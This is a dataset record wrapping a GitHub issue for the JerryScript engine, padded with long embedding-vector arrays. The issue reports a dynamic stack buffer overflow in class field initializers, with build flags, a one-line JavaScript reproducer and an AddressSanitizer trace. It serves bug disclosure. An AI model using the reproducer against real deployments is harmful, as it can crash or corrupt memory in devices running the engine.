0.011331320740282536, -0.005895910318940878, -0.0030668547842651606, 0.008983525447547436, 0.007220791652798653, 0.015717394649982452, -0.031797148287296295, 0.0035122563131153584, 0.034001510590314865, -0.006307340692728758, -0.025969181209802628, 0.012335361912846565, -0.011723877862095833, 0.02154536172747612, -0.01845019869506359, -0.001701396657153964, -0.007719037588685751, 0.0028101825155317783, -0.0010785892372950912, 0.022496558725833893, 0.0032725699711591005, -0.009021271020174026, 0.01257693488150835, -0.005578844808042049, 0.01336205005645752, 0.0011512500932440162, 0.0040161642245948315, -0.0020911230240017176, -0.0046880412846803665, -0.0036160575691610575, -0.0043747504241764545, -0.00632998812943697, 0.006163906306028366, 0.004295483697205782, 0.015626804903149605, -0.007711488287895918, -0.003576424438506365, -0.0017627336783334613, -0.0010153647745028138, -0.00007189415191533044, 0.012644877657294273, 0.015536214224994183, 0.011512501165270805, 0.006933922413736582, 0.013958435505628586, -0.015136107802391052, 0.007401971612125635, -0.003625494195148349, -0.0001605380530236289, -0.0008624939364381135, 0.017619788646697998, -0.02716195210814476, -0.001434344332665205, 0.007345352787524462, -0.03258226439356804, 0.0014635974075645208, 0.004521959461271763, -0.00872685294598341, -0.0005095697124488652, -0.014532173052430153, -0.010682091116905212, 0.005661885719746351, -0.0033329634461551905, 0.014094321057200432, 0.017680181190371513, 0.0420338399708271, 0.022964607924222946, -0.008719303645193577, -0.008462632074952126, -0.0068244594149291515, 0.005288201384246349, -0.00786624662578106, 0.008538123220205307, 0.00474466010928154, 0.010365025140345097, -0.002961166203022003, -0.011882410384714603, -0.002113770693540573, -0.005174963269382715, -0.009753542020916939, -0.016879968345165253, -0.02069985307753086, 0.01073493529111147, 0.0004973022732883692, 0.03810826316475868, -0.012033394537866116, 0.007971934974193573, 0.007307607214897871, -0.007111328188329935, -0.004978684708476067, -0.00228740181773901, -0.008221058174967766, -0.007401971612125635, 0.00000763764819566859, -0.006949021015316248, 0.013173320330679417, -0.0028309428598731756, 0.0033461744897067547, -0.019507084041833878, -0.015989165753126144, 0.02355344407260418, 0.034967806190252304, 0.01498512364923954, -0.00800213124603033, -0.007481238339096308, -0.010802878066897392, 0.005363692995160818, -0.007881345227360725, 0.013105377554893494, 0.02006572298705578, 0.004771082196384668, 0.00830409862101078, -0.004008614923804998, -0.004491762723773718, 0.022043608129024506, 0.01131622213870287, 0.0374741330742836, -0.006745193153619766, -0.011580443009734154, -0.0099724680185318, 0.026769395917654037, -0.007768107112497091, 0.023976197466254234, 0.0013399795861914754, 0.01941649243235588, -0.007258537225425243, 0.006692348979413509, 0.012622230686247349, 0.00830409862101078, -0.008583419024944305, -0.029456904157996178, 0.02302500233054161, -0.017725476995110512, 0.005273102782666683, -0.005212709307670593, 0.0018542675534263253, -0.006156357005238533, -0.0134601891040802, 0.016940362751483917, -0.00860606599599123, 0.012373107485473156, 0.0032725699711591005, 0.006843332666903734, 0.0027271416038274765, 0.027539411559700966, 0.012486345134675503, -0.007768107112497091, -0.00533727090805769, 0.006582885514944792, 0.011308672837913036, 0.01013100054115057, 0.013656468130648136, -0.020050624385476112, 0.0025837072171270847, 0.01482659112662077, -0.012848705984652042, 0.00912695936858654, 0.006873528938740492, -0.0032669079955667257, -0.0009427039767615497, -0.00830409862101078, 0.003753830213099718, 0.00403126236051321, 0.011572894640266895, 0.0022421067114919424, 0.008168214000761509, -0.018027443438768387, -0.012977042235434055, -0.0071679470129311085, 0.011973001062870026, 0.012486345134675503, -0.00013399796443991363, 0.035239577293395996, 0.00434455368667841, 0.015626804903149605, -0.01022913958877325, 0.02159065753221512, -0.005699631758034229, -0.014237754978239536, 0.00403126236051321, 0.005080598872154951, 0.024776412174105644, 0.020171411335468292, -0.00005791637158836238, -0.0037632666062563658, -0.012433500960469246, 0.007537857163697481, 0.0053523690439760685, 0.019129624590277672, 0.015596607699990273, -0.014637861400842667, -0.004544606897979975, 0.01474354974925518, 0.015490919351577759, 0.009466673247516155, 0.006009147968143225, -0.016215641051530838, -0.014320796355605125, 0.007315156050026417, 0.032763443887233734, 0.01922021433711052, -0.006654602941125631, -0.0011540809646248817, 0.0002254138235002756, -0.0363568551838398, -0.007039611227810383, 0.02672410011291504, -0.009413828141987324, 0.018284115940332413, -0.004646520595997572, 0.009277943521738052, 0.0073340293020009995, -0.007949287071824074, 0.0071377502754330635, -0.00191843556240201, 0.01917491853237152, 0.025244461372494698, 0.0015843843575567007, 0.00808517262339592, 0.009164705872535706, -0.035813312977552414, 0.013029886409640312, 0.0032291621901094913, -0.0008752331486903131, 0.023296771571040154, 0.013573426753282547, -0.031434789299964905, -0.023462854325771332, -0.015672098845243454, 0.0005402382812462747, 0.0017608464695513248, -0.020231803879141808, -0.017151739448308945, -0.015362583100795746, -0.0020873486064374447, -0.025455838069319725, -0.013618722558021545, 0.008998623117804527, 0.009262844920158386, -0.003298992058262229, 0.0011578556150197983, 0.0044653406366705894, -0.0014324571238830686, 0.012667525559663773, -0.006594209466129541, 0.009806386195123196, -0.0010597162181511521, -0.03517918288707733, 0.002070362912490964, 0.002268528798595071, -0.0015126671642065048, -0.0024364981800317764, 0.004571028985083103, 0.0017476353095844388, 0.01364136952906847, -0.007669967599213123, 0.012108885683119297, -0.007084906101226807, -0.00737177487462759, 0.007062258664518595, -0.016864869743585587, 0.009255295619368553, 0.027614902704954147, -0.0028233935590833426, 0.020518673583865166, 0.010138549841940403, -0.01137661561369896, -0.005582619458436966, 0.016094854101538658, 0.012682624161243439, -0.003880278905853629, 0.010719836689531803, 0.008402238599956036, 0.000611483643297106, 0.012675074860453606, -0.003436764469370246, 0.010100804269313812, -0.014970025978982449, 0.002300612861290574, 0.018465295433998108, -0.01089346781373024, 0.005639238283038139, 0.01721213199198246, -0.006650828290730715, 0.01436609122902155, 0.00014555764209944755, -0.0022175719495862722, -0.006367734167724848, 0.007534082513302565, -0.006865980103611946, -0.023840313777327538, -0.03463564068078995, 0.0014503863640129566, 0.007118877489119768, -0.006771615240722895, -0.01624583639204502, 0.021998312324285507, -0.004891869146376848, -0.024247968569397926, -0.012826058082282543, 0.0006383776199072599, 0.01704605109989643, 0.007775656413286924, 0.004012389574199915, 0.021937919780611992, 0.01573249325156212, 0.015158754773437977, 0.021817132830619812, -0.0057411519810557365, 0.0065111685544252396, -0.007775656413286924, -0.0013748945202678442, -0.0032178382389247417, -0.019325902685523033, 0.002330809598788619, -0.010629246942698956, -0.03593410179018974, -0.0055184513330459595, -0.011240730062127113, 0.025576625019311905, 0.015241796150803566, 0.009277943521738052, 0.007466139737516642, -0.0005638294387608767, -0.0011635174741968513, -0.005435410421341658, 0.005375016946345568, -0.00838713999837637, 0.006590434815734625, -0.01022913958877325, -0.0008422054816037416, 0.009466673247516155, 0.01370176300406456, 0.05269328132271767, 0.013490386307239532, 0.007579377386718988, -0.0012927972711622715, -0.005329721607267857, 0.00860606599599123, -0.020790444687008858, 0.005612815730273724, -0.021409476175904274, -0.0014579355483874679, -0.0020665882620960474, -0.01312047615647316, 0.011640836484730244, -0.018752165138721466, -0.004891869146376848, -0.0029743772465735674, -0.003474510507658124, 0.00844753347337246, -0.012312714010477066, -0.020322395488619804, -0.00115596828982234, 0.005559971556067467, 0.011210533790290356, 0.012886451557278633, 0.0039255740121006966, 0.0012984591303393245, 0.003449975745752454, 0.023326968774199486, 0.004416270647197962, 0.003493383526802063, 0.013158222660422325, -0.01278076320886612, 0.007888893596827984, 0.0038217727560549974, 0.016109952703118324, 0.00744349230080843, -0.0076171234250068665, 0.016381721943616867, -0.00868910737335682, -0.010395222343504429, 0.011769172735512257, 0.02062436193227768, -0.013837648555636406, 0.0164119191467762, 0.003740619169548154, 0.006224299781024456, -0.007647320162504911, -0.023296771571040154, 0.009579910896718502, -0.0016995093319565058, 0.022843820974230766, 0.01648741029202938, 0.00555619690567255, -0.005997824016958475, 0.008560771122574806, -0.04130911827087402, 0.00002006725662795361, -0.007700164336711168, -0.008228607475757599, -0.0019278720719739795, -0.024580132216215134, -0.00266297347843647, 0.004571028985083103, -0.0035424530506134033, -0.018993739038705826, 0.018072739243507385, 0.009225099347531796, 0.011822016909718513, -0.011331320740282536, 0.0030291087459772825, -0.003989742137491703, 0.005246680695563555, 0.00778320524841547, -0.010568853467702866, -0.013558329083025455, -0.0029139837715774775, 0.017468804493546486, 0.00639038160443306, 0.003312203101813793, 0.0015173853607848287, -0.005684533156454563, -0.019084328785538673, -0.011384164914488792, -0.01805764064192772, -0.007001865189522505, -0.013747057877480984, -0.002391203073784709, -0.0031498956959694624, -0.00497491005808115, 0.017499001696705818, -0.020231803879141808, 0.016502508893609047, -0.015672098845243454, 0.006322438828647137, -0.007511435076594353, 0.004850348923355341, 0.014841689728200436, 0.013807451352477074, 0.0016985656693577766, -0.0017117767129093409, -0.017061147838830948, -0.00796438567340374, -0.020548870787024498, 0.003712309757247567, -0.007730361074209213, -0.006073316093534231, -0.006156357005238533, -0.017363116145133972, -0.01251654140651226, -0.0026950575411319733, -0.007677516900002956, 0.01713664084672928, -0.001949575962498784, 0.004487988073378801, -0.0057411519810557365, -0.014781296253204346, -0.0027931968215852976, 0.0027290289290249348, 0.01183711551129818, 0.014683157205581665, -0.0013154447078704834, 0.004544606897979975, 0.014675607904791832, 0.0033159777522087097, 0.014788845553994179, 0.0011871086899191141, -0.017604690045118332, 0.008054976351559162, -0.003436764469370246, -0.005258004646748304, -0.006031795404851437, -0.011248279362916946, 0.0018693659221753478, 0.021635951474308968, -0.0158532802015543, 0.03084595315158367, -0.0028309428598731756, -0.011127492412924767, 0.01281850878149271, -0.004484213422983885, -0.011452107690274715, 0.03687020018696785, -0.015521115623414516, -0.0011691793333739042, -0.030151428654789925, -0.01175407413393259, -0.009934722445905209, -0.009700697846710682, 0.0015447511104866862, -0.016230739653110504, 0.024776412174105644, -0.01251654140651226, 0.02033749409019947, 0.00918735284358263, -0.0009398729889653623, 0.02130378782749176, 0.006714996416121721, 0.02759980596601963, -0.02137928083539009, 0.00416337326169014, -0.00973089411854744, 0.004654069896787405, -0.01083307433873415, 0.0022251210175454617, 0.00721324235200882, 0.006001598667353392, -0.0039482214488089085, -0.024897199124097824, 0.03578311577439308, -0.013792353682219982, 0.0005539211560972035, 0.0042992583476006985, -0.01412451732903719, -0.004676717333495617, 0.011746525764465332, 0.002221346367150545, 0.015943869948387146, 0.011527598835527897, 0.028460411354899406, 0.0239912960678339, 0.017755674198269844, -0.014909632503986359, -0.018918247893452644, 0.01600426249206066, -0.0028951107524335384, 0.007420844864100218, -0.011127492412924767, -0.0022855144925415516, 0.011308672837913036, 0.017604690045118332, -0.0017646210035309196, -0.0061903283931314945, 0.009896975941956043, 0.010297082364559174, -0.014894533902406693, 0.008160664699971676, -0.0029253074899315834, -0.012003197334706783, 0.017106443643569946, -0.005722279194742441, -0.0040237135253846645, -0.0036103958263993263, -0.0069225989282131195, 0.02411208301782608 ]
2,093
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 5962562e2dd1528472e6bea38e354b6ea73f559d ###### Build platform Ubuntu 20.04.1 LTS (Linux 5.4.0-42-generic x86_64) gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0 ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-O2 --debug \ --system-allocator=on --linker-flag=-fuse-ld=gold ``` ###### Test case ```javascript new (class C2 { x = 5 }) ``` ###### Output ```sh ==9633==ERROR: AddressSanitizer: dynamic-stack-buffer-overflow on address 0xffd311ec at pc 0x566f201e bp 0xffd30ee8 sp 0xffd30ed8 WRITE of size 4 at 0xffd311ec thread T0 #0 0x566f201d in vm_loop /home/jerryscript/jerry-core/vm/vm.c:3034 #1 0x566d8988 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4953 #2 0x566da514 in vm_run /home/jerryscript/jerry-core/vm/vm.c:5060 #3 0x566fbae2 in opfunc_init_class_fields /home/jerryscript/jerry-core/vm/opcodes.c:1021 #4 0x5673cb00 in ecma_op_function_call_native /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1244 #5 0x5674517d in ecma_op_function_construct_native /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1474 #6 0x5674517d in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1552 #7 0x566d8f35 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:907 #8 0x566d8f35 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4980 #9 0x566da514 in vm_run /home/jerryscript/jerry-core/vm/vm.c:5060 #10 0x56781451 in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:350 #11 0x56781451 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:608 #12 0x56781451 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:582 #13 0x5665bef7 in main /home/jerryscript/jerry-main/main-unix.c:123 #14 0xf774dee4 in __libc_start_main (/lib32/libc.so.6+0x1eee4) #15 0x5665dd94 in _start (/home/jerryscript/build/bin/jerry+0xcd94) Address 0xffd311ec is located in stack of thread T0 SUMMARY: AddressSanitizer: dynamic-stack-buffer-overflow /home/jerryscript/jerry-core/vm/vm.c:3034 in vm_loop Shadow bytes around the buggy address: 0x3ffa61e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa61f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x3ffa6230: 00 00 00 00 ca ca ca ca 00 00 00 00 00[04]cb cb 0x3ffa6240: cb cb cb cb 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==9633==ABORTING ``` <sup>Found by [Fuzzinator](http://fuzzinator.readthedocs.io/) with [grammarinator](https://github.com/renatahodovan/grammarinator).</sup>
Dynamic stack buffer overflow in class initializers
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4413/comments
0
2021-01-05T11:29:30
2021-01-08T13:08:56Z
https://github.com/jerryscript-project/jerryscript/issues/4413
778,896,339
4,413
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Dynamic stack buffer overflow in class initializers Issue date: --- start body --- ###### JerryScript revision 5962562e2dd1528472e6bea38e354b6ea73f559d ###### Build platform Ubuntu 20.04.1 LTS (Linux 5.4.0-42-generic x86_64) gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0 ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-O2 --debug \ --system-allocator=on --linker-flag=-fuse-ld=gold ``` ###### Test case ```javascript new (class C2 { x = 5 }) ``` ###### Output ```sh ==9633==ERROR: AddressSanitizer: dynamic-stack-buffer-overflow on address 0xffd311ec at pc 0x566f201e bp 0xffd30ee8 sp 0xffd30ed8 WRITE of size 4 at 0xffd311ec thread T0 #0 0x566f201d in vm_loop /home/jerryscript/jerry-core/vm/vm.c:3034 #1 0x566d8988 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4953 #2 0x566da514 in vm_run /home/jerryscript/jerry-core/vm/vm.c:5060 #3 0x566fbae2 in opfunc_init_class_fields /home/jerryscript/jerry-core/vm/opcodes.c:1021 #4 0x5673cb00 in ecma_op_function_call_native /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1244 #5 0x5674517d in ecma_op_function_construct_native /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1474 #6 0x5674517d in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1552 #7 0x566d8f35 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:907 #8 0x566d8f35 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4980 #9 0x566da514 in vm_run /home/jerryscript/jerry-core/vm/vm.c:5060 #10 0x56781451 in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:350 #11 0x56781451 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:608 #12 0x56781451 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:582 #13 0x5665bef7 in main /home/jerryscript/jerry-main/main-unix.c:123 #14 0xf774dee4 in __libc_start_main (/lib32/libc.so.6+0x1eee4) #15 0x5665dd94 in _start (/home/jerryscript/build/bin/jerry+0xcd94) Address 0xffd311ec is located in stack of thread T0 SUMMARY: AddressSanitizer: dynamic-stack-buffer-overflow /home/jerryscript/jerry-core/vm/vm.c:3034 in vm_loop Shadow bytes around the buggy address: 0x3ffa61e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa61f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x3ffa6230: 00 00 00 00 ca ca ca ca 00 00 00 00 00[04]cb cb 0x3ffa6240: cb cb cb cb 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x3ffa6280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==9633==ABORTING ``` <sup>Found by [Fuzzinator](http://fuzzinator.readthedocs.io/) with [grammarinator](https://github.com/renatahodovan/grammarinator).</sup> --- end body ---
3,995
[ -0.026400800794363022, 0.005759068299084902, -0.008060548454523087, 0.004230713937431574, 0.02098892256617546, 0.004137652460485697, -0.030953649431467056, 0.022377684712409973, -0.025398600846529007, 0.03278624266386032, -0.01779620163142681, 0.022678345441818237, -0.011052829213440418, 0.003990902099758387, 0.017538493499159813, 0.026572605594992638, -0.04661659896373749, 0.0006894596153870225, -0.002628984162583947, 0.008096341043710709, 0.0025448710657656193, 0.016421755775809288, -0.019270867109298706, 0.03599328175187111, -0.00997904408723116, 0.0225351732224226, 0.006134893279522657, 0.004352409392595291, 0.0006402444560080767, 0.022563807666301727, 0.004227134864777327, -0.006950969807803631, -0.028133174404501915, -0.004710338078439236, 0.0375395342707634, 0.011238952167332172, 0.02737436629831791, 0.06534340977668762, -0.011890382505953312, 0.0027721556834876537, 0.026815997436642647, -0.05635225027799606, -0.022821515798568726, 0.05612317845225334, 0.03799768164753914, 0.046759769320487976, 0.01373729296028614, -0.003233883297070861, -0.06809230148792267, 0.001975764986127615, 0.010129374451935291, -0.008890941739082336, 0.010122215375304222, -0.04716064780950546, 0.024911819025874138, -0.002865216927602887, 0.0041340733878314495, 0.01322187576442957, 0.025269746780395508, 0.006822115741670132, 0.04495580866932869, -0.008225195109844208, 0.014388722367584705, 0.005819916259497404, 0.007097720634192228, 0.06225091218948364, -0.025398600846529007, 0.013042911887168884, 0.005984563380479813, 0.004338092636317015, -0.001521195750683546, -0.02077416516840458, 0.022979004308581352, 0.050768569111824036, -0.001597255584783852, -0.01604950986802578, 0.005862867459654808, 0.042750969529151917, -0.025284063071012497, -0.0010603629052639008, 0.0031622976530343294, 0.03418932110071182, -0.008533013984560966, 0.0200439915060997, 0.002827634569257498, -0.003955109044909477, -0.013873306103050709, -0.06631697714328766, -0.009943251498043537, -0.03164087235927582, -0.009248870424926281, 0.032958049327135086, -0.008175085298717022, 0.007867266424000263, -0.02183363400399685, 0.017381004989147186, -0.031239992007613182, -0.017309417948126793, -0.048076946288347244, 0.023666227236390114, -0.002668356290087104, 0.02383803203701973, -0.0062279547564685345, -0.0018880724674090743, -0.02453957311809063, 0.035792842507362366, -0.0007167516741901636, -0.024210277944803238, 0.04544259235262871, 0.08951073884963989, 0.023508738726377487, -0.02644375152885914, -0.03493381291627884, 0.029922816902399063, -0.012334213592112064, 0.02690190076828003, -0.01733805239200592, -0.026100140064954758, -0.03493381291627884, -0.0007100405055098236, -0.007172885350883007, -0.006589462049305439, -0.02395256981253624, -0.02664419263601303, -0.03103955276310444, 0.030495502054691315, 0.018669545650482178, -0.0029743851628154516, -0.0003219118807464838, -0.002843741327524185, -0.028591321781277657, -0.03381707891821861, 0.0051899622194468975, -0.026400800794363022, 0.008540172129869461, -0.01461779698729515, 0.004395361058413982, 0.00985734909772873, 0.0003105029172729701, -0.032242193818092346, -0.03453293442726135, -0.002278214320540428, 0.03218492493033409, 0.014632114209234715, -0.010845230892300606, -0.007112037856131792, -0.022621076554059982, 0.03942939639091492, -0.005139851942658424, -0.027331413701176643, 0.009492261335253716, 0.0009449310600757599, 0.011861748062074184, 0.03158360347151756, 0.011818796396255493, -0.01579180173575878, 0.003765407018363476, 0.03304395079612732, 0.02077416516840458, 0.03138316422700882, -0.02369486168026924, -0.022334733977913857, -0.03516288846731186, -0.03453293442726135, -0.0589866042137146, 0.0013493901351466775, -0.012520336546003819, 0.04066066816449165, -0.0008442636462859809, 0.008719136007130146, -0.001698370324447751, 0.0047174966894090176, 0.033215757459402084, 0.03776860609650612, -0.04541395977139473, -0.011990602128207684, 0.027560489252209663, 0.010673425160348415, 0.008189402520656586, -0.014030794613063335, 0.0015847281320020556, 0.017066027969121933, -0.020029675215482712, 0.012806679122149944, 0.0001932813465828076, -0.00931329745799303, 0.011904699727892876, -0.04243599250912666, 0.00203482317738235, -0.051598962396383286, 0.02159024216234684, -0.004921515937894583, -0.001993661280721426, 0.012140932492911816, 0.015977924689650536, 0.022692661732435226, -0.02194816991686821, -0.02360895834863186, -0.016092462465167046, 0.016679463908076286, 0.03055277094244957, -0.0011131573701277375, -0.06402623653411865, -0.008661868050694466, -0.022606758400797844, -0.03375981003046036, -0.010208118706941605, -0.010344131849706173, 0.03776860609650612, 0.016593562439084053, -0.02264971099793911, -0.004091121722012758, 0.0392003208398819, -0.051742132753133774, -0.017180563881993294, -0.013322096318006516, 0.0005758173647336662, 0.014560528099536896, -0.023408519104123116, -0.042636435478925705, 0.007781364023685455, -0.029192641377449036, -0.020588042214512825, -0.02051645703613758, -0.013680024072527885, -0.015319336205720901, -0.04816284775733948, 0.007205099333077669, -0.026143092662096024, -0.0031444011256098747, 0.02027306519448757, 0.003550649853423238, -0.008117816410958767, -0.011453709565103054, 0.04120472073554993, -0.003636552719399333, 0.018912937492132187, 0.0023909618612378836, 0.005572945345193148, 0.032614436000585556, 0.0005650795064866543, 0.007838631980121136, -0.05921567976474762, -0.03241399675607681, -0.00615994818508625, 0.027531854808330536, -0.015290701761841774, -0.01981491781771183, -0.017910737544298172, -0.004577904473990202, -0.019972406327724457, -0.016922855749726295, 0.020845752209424973, -0.050081346184015274, 0.013057229109108448, 0.023623276501893997, 0.012763727456331253, 0.03398888185620308, -0.021089142188429832, 0.007738412357866764, 0.009885982610285282, 0.019027475267648697, -0.020588042214512825, 0.04080383852124214, 0.00938488356769085, 0.00468886224552989, -0.012241152115166187, 0.0034253750927746296, -0.018683863803744316, -0.024110058322548866, 0.0406033992767334, -0.0344756655395031, 0.020502140745520592, -0.032127656042575836, -0.01221251767128706, -0.000022971733415033668, -0.0054261949844658375, 0.031554970890283585, -0.005433353595435619, -0.018111178651452065, 0.02960783988237381, 0.03796904534101486, 0.018225714564323425, 0.007666826713830233, -0.020731214433908463, 0.0014111327473074198, 0.016564927995204926, -0.026615558192133904, 0.010916817001998425, -0.051484424620866776, -0.026586923748254776, -0.024396400898694992, -0.03731045871973038, 0.02075984887778759, 0.02983691357076168, 0.008404158987104893, -0.00477834464982152, -0.023451469838619232, 0.00487140566110611, -0.003386002965271473, -0.02147570624947548, -0.046902939677238464, -0.012305579148232937, -0.012964167632162571, -0.03479064255952835, 0.007316057104617357, 0.007781364023685455, 0.006768426392227411, -0.010809438303112984, -0.0035166468005627394, 0.032127656042575836, -0.04309458285570145, 0.006772005930542946, -0.011496661230921745, -0.036394160240888596, -0.0022871627006679773, 0.0344756655395031, -0.010651949793100357, -0.026758728548884392, 0.027889782562851906, -0.03172677382826805, 0.000628611771389842, -0.03278624266386032, 0.013007119297981262, 0.026715777814388275, -0.004620856139808893, -0.03897124528884888, 0.006850750185549259, -0.04847782477736473, 0.008039072155952454, -0.01066626701503992, -0.018827034160494804, -0.03891397640109062, -0.01639312133193016, -0.049709100276231766, -0.02784683182835579, -0.04578620195388794, 0.011102939955890179, -0.014245551079511642, -0.029636472463607788, -0.03576420620083809, -0.010766486637294292, -0.02180499956011772, 0.03799768164753914, -0.014932774007320404, -0.014352929778397083, 0.019285183399915695, -0.00927034579217434, 0.014138172380626202, 0.008153609000146389, 0.0010093580931425095, 0.017366686835885048, 0.03940076008439064, -0.01603519357740879, 0.03811221942305565, -0.02761775627732277, -0.03441839665174484, -0.005361767951399088, 0.014567687176167965, -0.0012106929207220674, -0.03338756412267685, -0.011117257177829742, 0.008461427874863148, 0.007076244801282883, -0.005623055621981621, -0.03078184463083744, 0.017867786809802055, -0.010458668693900108, -0.025412917137145996, -0.01427418552339077, -0.04461219906806946, 0.03270034119486809, -0.005744751077145338, -0.014345770701766014, -0.00014887585712131113, -0.042178284376859665, 0.009571005590260029, -0.00568748265504837, 0.002414227230474353, 0.021776365116238594, 0.006174265407025814, 0.03172677382826805, 0.017409637570381165, -0.03965846821665764, 0.006911597680300474, 0.004184183198958635, -0.033788442611694336, 0.022792881354689598, -0.030953649431467056, 0.004359568003565073, -0.01924223266541958, 0.049623195081949234, -0.03659460321068764, -0.02312217652797699, 0.009406358934938908, 0.020115576684474945, -0.02264971099793911, -0.050195880234241486, 0.009749970398843288, -0.039944812655448914, -0.019027475267648697, 0.0021941012237221003, -0.015548410825431347, -0.016321536153554916, 0.013708658516407013, 0.0074019599705934525, -0.021418437361717224, 0.006303119473159313, 0.011518136598169804, 0.004520636051893234, 0.02998008392751217, -0.020001040771603584, -0.01137496531009674, 0.017194882035255432, 0.035821475088596344, -0.0027220456395298243, 0.03633689507842064, -0.007545131258666515, -0.03917168825864792, 0.005494201090186834, 0.010630474425852299, -0.026214677840471268, 0.020831434056162834, 0.028462467715144157, 0.002518026391044259, 0.007044031284749508, -0.026329215615987778, 0.01816844753921032, -0.018784083425998688, -0.005447670817375183, -0.00334842037409544, 0.00843279343098402, 0.0021583084017038345, 0.013422315940260887, -0.015061628073453903, -0.04633025452494621, -0.03235672786831856, -0.043581366539001465, -0.03811221942305565, -0.035563766956329346, 0.02408142387866974, 0.031096821650862694, -0.019886502996087074, -0.04893597215414047, 0.0019113377202302217, -0.005365347024053335, -0.03937212750315666, -0.016679463908076286, -0.005862867459654808, 0.00022795566474087536, -0.014152489602565765, -0.016593562439084053, -0.011797321029007435, 0.008568806573748589, 0.015949290245771408, -0.004928674548864365, -0.02995144948363304, -0.009427834302186966, -0.014675064943730831, 0.021890902891755104, -0.019385403022170067, 0.00769546115770936, -0.01699444092810154, 0.006857908796519041, -0.005086163058876991, 0.05835665017366409, 0.008533013984560966, -0.045242153108119965, -0.02088870294392109, -0.021733414381742477, -0.0016876325244084, 0.0034808539785444736, -0.0028884822968393564, 0.01722351647913456, -0.014438832178711891, 0.004982363432645798, 0.008167926222085953, -0.02183363400399685, -0.007530814036726952, -0.04446902871131897, -0.010351289995014668, -0.009477945044636726, -0.025541773065924644, 0.03146906569600105, 0.013314937241375446, -0.009091381914913654, 0.016822636127471924, 0.034847911447286606, 0.029808279126882553, 0.04950866103172302, 0.021432753652334213, 0.02007262594997883, -0.03490518033504486, -0.05331701785326004, 0.01841183751821518, -0.012133773416280746, -0.009427834302186966, -0.002972595626488328, 0.039601199328899384, 0.013107338920235634, 0.013816037215292454, -0.055493224412202835, 0.041347891092300415, 0.026014238595962524, 0.0042521897703409195, -0.010279703885316849, -0.05835665017366409, 0.035936012864112854, -0.00651429733261466, -0.02511225827038288, 0.00728742266073823, -0.03530605882406235, 0.007011817768216133, -0.004341671708971262, -0.014589162543416023, -0.03078184463083744, 0.00334842037409544, 0.0015829384792596102, 0.0322994589805603, -0.008296781219542027, -0.0078529492020607, -0.031182724982500076, 0.020459188148379326, 0.027159608900547028, 0.005222175735980272, 0.006940232124179602, 0.03418932110071182, 0.004706758540123701, -0.018254349008202553, -0.010974084958434105, -0.021747730672359467, 0.018311617895960808, 